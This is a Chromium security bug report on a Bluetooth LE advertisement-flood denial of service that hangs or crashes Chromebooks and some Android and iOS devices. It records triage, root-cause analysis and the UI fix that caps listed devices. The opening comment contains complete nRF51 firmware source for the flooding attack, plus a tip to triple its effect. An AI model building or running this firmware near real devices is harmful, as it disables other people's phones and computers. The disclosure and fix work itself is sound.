Issue metadata
Sign in to add a comment
|
Security: bluetooth LE advertisement storm can remotely hang/crash chromebooks, android devices, and some iOS devices with little or no user action needed |
|||||||||||||||||||||||||||||||||||||
Issue descriptionVULNERABILITY DETAILS Remote crash of any ChromeOS device with bluetooth on if any scanning is done (eg: user opens BT settings, user just turned on bluetooth, ARC++ app does scanning). This can be done using a very cheap nRF51 dongle with a very simple firmware that basically just advertises as thousands of Bluetrooth LE devices at once. Normal Bluetooth stacks (including one from Nordic meant for that dongle) do not allow this, but crafting the packets by hand and instructing the radio to send them as fast as possible is easy. VERSION ChromeOS: all versions, presumably, crash. Definitely M59, M60, M61 Android: most phones tested had various issues. Some FW, some SW. iOS: iPad air 2 crashes, iPhone SE does not Windows 10: no crash ever REPRODUCTION CASE The repro case is basically to send out as many LE advertisemenets as possible, while pretending t be different devices. Basically this means that one sends out valid LE ADV_NONCONN_IND packets over channels 37,38,39 with an increasing (or in some other way nonrepeating) MAC address and adv contents that are valid. I used: 0x02, 0x01, 0x05, 0x0D, 0x09, 'd', 'm', 'i', 't', 'r', 'y', 'g', 'r', '0', '0', '0', '0'. I also varied the name just to make it easier to spot the fact that this works. The dongle I used ti reproduce the issue is this one: https://www.digikey.com/product-detail/en/nordic-semiconductor-asa/NRF51-DONGLE/1490-1037-ND/5022448 And the actual code you can compile for it to make it repro the issue is as follows: #include <stdbool.h> #include <stdint.h> #include "nrf.h" static void sendpackets(void) { static const uint8_t chNums[] = {37, 38, 39}; static const uint8_t chFreqs[] = {2, 26, 80}; uint32_t i, ctr, chIdx = 100; //to start things well volatile uint8_t pkt[] = { //volatile bc else compiler assumes we do not read it and removes writes 0x42, //PDU type, random addr 0x17, //0x17 bytes of payload 0x00, 0x00, 0x00, 0x00, 0x00, 0xDD, //mac address 0x02, 0x01, 0x05, //flags: le only, limited discovery 0x0D, 0x09, 'd', 'm', 'i', 't', 'r', 'y', 'g', 'r', //name '0', '0', '0', '0', }; while(1) { if (++chIdx >= 3) { chIdx = 0; ctr++; //vary name for (i = 0; i < 4; i++) { static const char hexch[64] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz#*"; //base64-ish pkt[sizeof(pkt) - 1 - i] = hexch[(ctr >> (i * 6)) & 0x3F]; } //vary MAC addr for (i = 0; i < 4; i++) pkt[i + 2] = ctr >> (8 * i); } NRF_RADIO->FREQUENCY = chFreqs[chIdx]; NRF_RADIO->DATAWHITEIV = chNums[chIdx]; //unused for now NRF_RADIO->PACKETPTR = (uint32_t)pkt; NRF_RADIO->EVENTS_DISABLED = 0; NRF_RADIO->TASKS_TXEN = 1; while (!NRF_RADIO->EVENTS_DISABLED); } } void main(void) { uint32_t i; //init clocks (our crystal is 16mhz) NRF_CLOCK->XTALFREQ = 0xFFFFFFFF; //external crystal is 16MHz NRF_CLOCK->TASKS_HFCLKSTART = 1; //start hf clock while (!NRF_CLOCK->EVENTS_HFCLKSTARTED); //wait for clock start //trim radio for best reception if trim values present in FICR if (NRF_FICR->BLE_1MBIT[4] & 0x80000000) { NRF_RADIO->OVERRIDE0 = NRF_FICR->BLE_1MBIT[0]; NRF_RADIO->OVERRIDE1 = NRF_FICR->BLE_1MBIT[1]; NRF_RADIO->OVERRIDE2 = NRF_FICR->BLE_1MBIT[2]; NRF_RADIO->OVERRIDE3 = NRF_FICR->BLE_1MBIT[3]; NRF_RADIO->OVERRIDE4 = NRF_FICR->BLE_1MBIT[4]; } //init radio NRF_RADIO->MODE = 3; //BLE 1Mbit mode NRF_RADIO->PCNF0 = 0x00108; //length is 8 bits long, S0 is one byte NRF_RADIO->PCNF1 = 0x0203007f; //no whitening, 3 byte addr, no static data NRF_RADIO->CRCCNF = 0x103; //3-byte crc skipping address NRF_RADIO->CRCINIT = 0x00555555; //proper crc settings for BLE NRF_RADIO->CRCPOLY = 0x0000065B; //proper crc settings for BLE NRF_RADIO->TIFS = 0; //no inter-packet spacing, hahaha! NRF_RADIO->SHORTS = 3; //shotcut for ready to start and for end to disable NRF_RADIO->BASE0 = 0x89BED600; //split between 3 bytes here an done in prefix... NRF_RADIO->PREFIX0 = 0x8E; //actually postfix... NRF_RADIO->TXADDRESS = 0; //use address index 0 NRF_RADIO->TXPOWER = 4; //4dBm (max power) sendpackets(); } With this code, the dongle will send out approximately 2400 advertisements per second, across three channels. This means that any device scanning in the vicinity will feel as if it discovered 800 new devices per second. The attack can be improved by using three dongles, each tuned to a particular channel, thus skipping the frequency hopping need and improving efficiency 3x. In some devices (android, some intel-7265 based chromebooks) this overwhelms the bluetooth chip and it ceases to work requiring a power cycle. This does not happen each time, but does often. In devices where the chip survives, the kernel will start using a lot of CPU trying to keep track of all these devices. Within seconds of being near this device android devices will generally start seeing bluetooth stacks crash. Chromebooks whose users initiate an LE scan (for example by clicking "bluetooth" to "on" in preferences) will immediately see their entire UI hang. Within seconds all keys on the device become nonresponsive (even ctrl + alt + refresh to switch to a text console no longer has effect). If the device is not removed from the vicinity of the dongle, it will sometimes eventually self-reboot. Sometimes leaving the vicinity of the dongle can help, sometimes it is too late. For android, sometimes the devices manage to not crash and instead get very very slow. Those will usually recover when they leave the radio range of the dongle. But most users will have force-rebooted them by then as their UI will have appeared hung this entire time. Newer iOS devices appear to not crash when near such a device, but some repros have been obtained by pretending to be an iBeacon. No further work went into testing iOS The main cause is that the pipelines handling advertisements in various BT stacks were simply not meant to handle 800 devices per sec and an ever-increasing total number of "seen" devices. this cases hihg CPU and memory usage leading to hangs and crashes. To mitigate, basically memory limits need to be placed and packets ratelimited as soon as possible to waste as little CPU as possible dropping them. Currently in chromeos each packet is sent from hardware to driver, to bluez in kernel, to userspace. all of this uses hundreds of thousands of cpu cycles per each seen device. furthermore, bluetoothd, dbus, and chromeos ui keep a COMPLETE list of recently seen devices. This cache does expire, but in many minutes, allowing us to easily make it occupy a Lot of memory and operations on it start being very slow. FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION Type of crash: hang: ui, sometimes, kernel, sometimes firmware
,
Sep 14 2017
,
Sep 15 2017
Thanks for the detailed writeup. The hardware lockups you are seeing are likely indicating firmware crashes. We'll need to work with the hardware vendors to resolve these. Let's start a list of BT chips that we have observed locking up. I've started a spreadsheet here: https://docs.google.com/spreadsheets/d/1SBrmGkQsZAdl4gw1jS9cRzFdXE3i6AHngzFGyMz7-RY/edit#gid=0 Dmitry, can you fill in the data points you already have? The spontaneous reboots you're seeing are probably a result of kernel panics. In the worst case, these are due to crashes and can be exploited to obtain remote code execution. In the best case, this just the kernel hitting a OOM situation it can't handle and giving up. That'd be merely a denial of service attack. Regarding the userspace hangs, these are probably "just" denial-of-service AFAICT. Let me try to assess severity: - The hardware lockups (and potential firmware RCE) are severity-high assuming the bluetooth hardware isn't DMA-capable (which I don't have a full picture on, but a few quick spot checks suggest that assumption is correct). - The kernel panics/crashes are severity-critical if they allow RCE, severity-high if only DoS. - userspace lockups are most likely DoS only (Note that I consider the DoS in this case severity-high, since they can be triggered remotely and make the machine unusable). Given the uncertainty regarding the kernel panics/crashes, I'll set severity-critical for now.
,
Sep 15 2017
Breaking out bugs for individual issues: hardware lockups - let's file individual bugs as details for BT chips become available kernel panics - issue 765605 userspace - unclear whether we need a bug if we cap number of devices in the kernel already
,
Sep 15 2017
This is a critical security issue. If you are not able to fix this quickly, please revert the change that introduced it. If this doesn't affect a release branch, or has not been properly classified for severity, please update the Security_Impact or Security_Severity labels, and remove the ReleaseBlock label. To disable this altogether, apply ReleaseBlock-NA. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Sep 15 2017
,
Sep 15 2017
This is ongoing internal research on a potentially-critical security issue. No need to hold releases at this time.
,
Sep 15 2017
I am not sure if we are seeing FW lockups here. FW getting fubar'ed would cause us to lose the BT adapter, but a hang or a reboot. Our only interaction with the FW is over HCI which is an async protocol.
,
Sep 15 2017
FWIW, firmware crashes in other hardware I have seen cause similar behavior - the device still being present but not servicing requests with code accessing the device potentially hanging. My understanding is that machines in this state did actually not reboot (otherwise it wouldn't have been possible to investigate and find that the BT hardware is stuck and not functioning any longer).
,
Sep 15 2017
,
Sep 15 2017
I actually said that incorrectly. I don't believe that FW lockups are _causing the hang. The FW could very well be locked up also, but the only effect that would have is that if the user tried to "use" Bluetooth, that would fail. The OS would work just fine otherwise. In fact, if the FW locks up, that is a better situation for the device to be in, since it will no longer be overloading the kernel with new events. Since the kernel is locking up, I suspect the FW is just fine and continuing to DoS our kernel :)
,
Sep 15 2017
,
Sep 15 2017
,
Sep 15 2017
In somce cases I did see FW lock up, in most kernel seems to
,
Sep 18 2017
dmitrygr@, rkc@, is there any updates on this bug? Seems we haven't yet find out what caused the hang and DoS. Is there anything I can help?
,
Sep 20 2017
We do need an owner for this critical bug. Any volunteers? :)
,
Sep 20 2017
Ha, me I guess
,
Sep 20 2017
I'll keep looking at the kernel aspects.
,
Sep 20 2017
,
Sep 20 2017
Note that we can downgrade this from Critical if/when we confirm that this is not a kernel RCE vector.
,
Sep 20 2017
#20: I think we'll need more data before concluding that. We may need kernel mitigation to limit packet flooding to userspace. Observations so far (on eve, with chromeos-4.12): - Kernel is stable. - As soon as attack starts, the chrome main process goes to 100% CPU. It never recovers. Normally it is waiting on an epoll; that is no longer seen after the attack started. - bluetoothd is initially at ~80% or more CPU, but drops to 0% after some time. This happens faster on x86 (eve, cyan) than on kevin, but is seen there as well. This may suggest a firmware hang, but that is difficult to determine w/o working UI. - binder errors may be seen after some time, possibly due to killed threads. Most are related to pending transactions, but I observed one "BUG: sleeping function called" in binder after ~15 hours uptime; I'll file a bug for that.
,
Sep 26 2017
,
Sep 26 2017
,
Oct 4 2017
dmitrygr: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 6 2017
dmitrygr: What's the status here? If you don't have time to work on this, who else on the BT team can pick this up?
,
Oct 15 2017
We commit ourselves to a 30 day deadline for fixing for critical severity vulnerabilities, and have exceeded it here. If you're unable to look into this soon, could you please find another owner or remove yourself so that this gets back into the security triage queue? For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 18 2017
dmitrygr: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 31 2017
The main issue seems to be in chrome the ui dies first (by running itself out of memory) before kernel and bluetoothd can die so this needs to be reassigned to chrome ui team if and when chrome is fixed we can re-eval to see if we need to fix any lower layers (they may get a chance to fail if chrome doesn't fail first) Sending to rkc@ because he might know who the relevant chrome ui people might be
,
Oct 31 2017
,
Nov 1 2017
,
Nov 2 2017
Re comment 28: Can't you just switch BT on, then kill the UI on a device (in dev mode), then repro the attack?
,
Nov 6 2017
In Chrome, this is a performance/usability issue, not a security issue. We should file a separate issue to sanity check the number of devices we load in the UI. *This* issue in particular is a security issue. As Mattias mentioned, it should still be repro-able by simply doing stop ui and staring a scan via bluetoothctl.
,
Nov 9 2017
I did look into this more this week. In all cases, the only process that doesn't recover after leaving the area with flooding packets is chrome UI process. The UI basically hangs itself. Bluetoothd recovers in tens of seconds. Chrome process eats cpu and is unresponsive forever. The fix is needed in UI layer. Other processes seem to cope with this attack given time to recover outside of radio range. After UI is fixed, we can consider if we want to do more (for example to allow continue Chromebook operation INSIDE radio range of attack)
,
Nov 9 2017
So then is this still a security issue? I guess maybe a DoS?
,
Nov 9 2017
Sarah, could you pick this up?
,
Nov 9 2017
,
Nov 10 2017
I tried to limit the devices number to 20 and the bluetooth settings page will not freeze, but the system tray still will. I'm investigating why.
,
Nov 11 2017
System tray seems to re-create the bluetooth list every time there's a update to one of devices in the list. Frequently update the UI could be expensive. I've added a timer to limit the frequency. CL: https://chromium-review.googlesource.com/c/chromium/src/+/765014
,
Nov 11 2017
,
Nov 13 2017
Thanks Sarah! Could we maybe update the list instead of re-creating it?
,
Nov 13 2017
,
Nov 14 2017
,
Nov 14 2017
Re comment #33: Can you clarify whether bluetoothd runs into EOM or crashes otherwise? Your comment suggests that is not the case, but I'd like to confirm. If that is the case, then we can downgrade this to Security_Impact-Low. I'd still expect bluetoothd to handle this gracefully (i.e. not lock up - your comment suggests something bad is happening if there's a need to "recover"), but that's just a regular bug.
,
Nov 14 2017
We commit ourselves to a 60 day deadline for fixing for high severity vulnerabilities, and have exceeded it here. If you're unable to look into this soon, could you please find another owner or remove yourself so that this gets back into the security triage queue? For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Nov 14 2017
Speaking with ortuno@ about it more; I don't think the correct fix is in Chrome. Even though it can work, getting out of sync with devices that BlueZ knows about doesn't seem like a good solution. Let us instead fix this in BlueZ. Given that Sarah has no experience with BlueZ, can someone in the Systems Bluetooth team pick this up?
,
Nov 29 2017
,
Nov 30 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromium/src.git/+/3c11bd5df40407310a1ebb31904a4fe819c342d0 commit 3c11bd5df40407310a1ebb31904a4fe819c342d0 Author: Sarah Hu <xiaoyinh@chromium.org> Date: Thu Nov 30 01:06:49 2017 cros: limit number of bluetooth devices in the UI. If we intentionally send a lot of bluetooth advertisements (like 1000 per second), the chromeOS UI will keep updating new devices and eventually run out of memory. This CL set maximum number of bluetooth devices to be 50 also adds a timer to avoid frequently update the system tray UI. Bug: 765371 Cq-Include-Trybots: master.tryserver.chromium.linux:closure_compilation Change-Id: I1485d690a3e66b8580c2d0296c3297334a6a219a Reviewed-on: https://chromium-review.googlesource.com/765014 Reviewed-by: Rahul Chaturvedi <rkc@chromium.org> Reviewed-by: James Cook <jamescook@chromium.org> Reviewed-by: Steven Bennetts <stevenjb@chromium.org> Commit-Queue: Xiaoyin Hu <xiaoyinh@chromium.org> Cr-Commit-Position: refs/heads/master@{#520359} [modify] https://crrev.com/3c11bd5df40407310a1ebb31904a4fe819c342d0/ash/system/bluetooth/tray_bluetooth.cc [modify] https://crrev.com/3c11bd5df40407310a1ebb31904a4fe819c342d0/ash/system/bluetooth/tray_bluetooth_helper.cc [modify] https://crrev.com/3c11bd5df40407310a1ebb31904a4fe819c342d0/chrome/browser/resources/settings/bluetooth_page/bluetooth_subpage.js [modify] https://crrev.com/3c11bd5df40407310a1ebb31904a4fe819c342d0/chrome/test/data/webui/settings/bluetooth_page_tests.js [modify] https://crrev.com/3c11bd5df40407310a1ebb31904a4fe819c342d0/chrome/test/data/webui/settings/fake_bluetooth.js
,
Nov 30 2017
The fix is landed in the UI layer. Is there anything left for this issue?
,
Nov 30 2017
Since this doesn't cause a hang anymore, I would consider this fixed.
,
Dec 1 2017
,
Dec 4 2017
,
Dec 15 2017
,
Dec 15 2017
This bug requires manual review: M64 has already been promoted to the beta branch, so this requires manual review Please contact the milestone owner if you have questions. Owners: cmasso@(Android), cmasso@(iOS), kbleicher@(ChromeOS), abdulsyed@(Desktop) For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Dec 15 2017
CL in comment# 47 initially landed in 64.0.3281.0. No need to merge.
,
Dec 18 2017
,
Jan 22 2018
,
Mar 9 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Mar 27 2018
,
Sep 26
|
||||||||||||||||||||||||||||||||||||||
►
Sign in to add a comment |
||||||||||||||||||||||||||||||||||||||
Comment 1 by dmitrygr@google.com
, Sep 14 2017